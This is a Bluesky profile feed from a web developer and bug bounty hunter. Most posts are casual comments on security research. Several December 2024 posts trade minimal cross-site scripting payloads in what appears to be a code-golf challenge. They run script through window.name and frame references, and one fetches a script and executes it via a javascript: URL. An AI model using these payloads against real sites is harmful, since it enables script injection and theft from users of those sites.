Tom Anthony
@tomanthony.bsky.social
Web dev since 1998. Bug bounty & security enthusiast. PhD in AI. CTO at SearchPilot - data driven SEO.

https://www.tomanthony.co.uk
I think with the race condition 11 is possible with: open(top.x)?
December 13, 2024 at 3:50 PM
This is 13 without the race condition, using your cool build up method @terjanq.me:

www.tomanthony.co.uk/temp/joax1.h...
December 13, 2024 at 3:49 PM
Within the rules of no framing / no window context, I think we can get down to 64 with:

fetch`/hack.js`.then(r=>r.text()).then(b=>open('javascript:'+b))
December 13, 2024 at 3:29 PM
Or if you are 'cheating' and using the run() function on the page then you can do 16:

run(top[0].name)
December 12, 2024 at 6:51 PM
If the real case was truly frameable, then you iframe another page on joaxcar.com, and then iframe this one with this 20 character payload:

location=top[0].name

If it isn't frameable, you can do 23 chars:

location=opener[0].name
December 12, 2024 at 6:42 PM
I feel the same. I feel like years of Twitter made me much more cautious about what I shared. Trying to get out of that mindset now.
November 24, 2024 at 8:27 AM
I'm not sure that it is! But don't know for sure. I'll see if I can crack it this evening, but otherwise I'll ping your way. (Though you need to follow me so I can DM)
November 22, 2024 at 12:48 PM
Making lunch and already found one case partially working in the wild on a big target. Ping me a DM on X (@tomanthonyseo) if you want to collab on it! :)
November 22, 2024 at 12:18 PM
This is incredible research!
November 22, 2024 at 10:48 AM
I’m here! :)
November 21, 2024 at 6:10 PM
This is basically identical to how I hack! Look for the new thing and then see something that looks interesting. Hopefully get far enough that I have a ‘lead’ and take it from there.
November 20, 2024 at 11:16 AM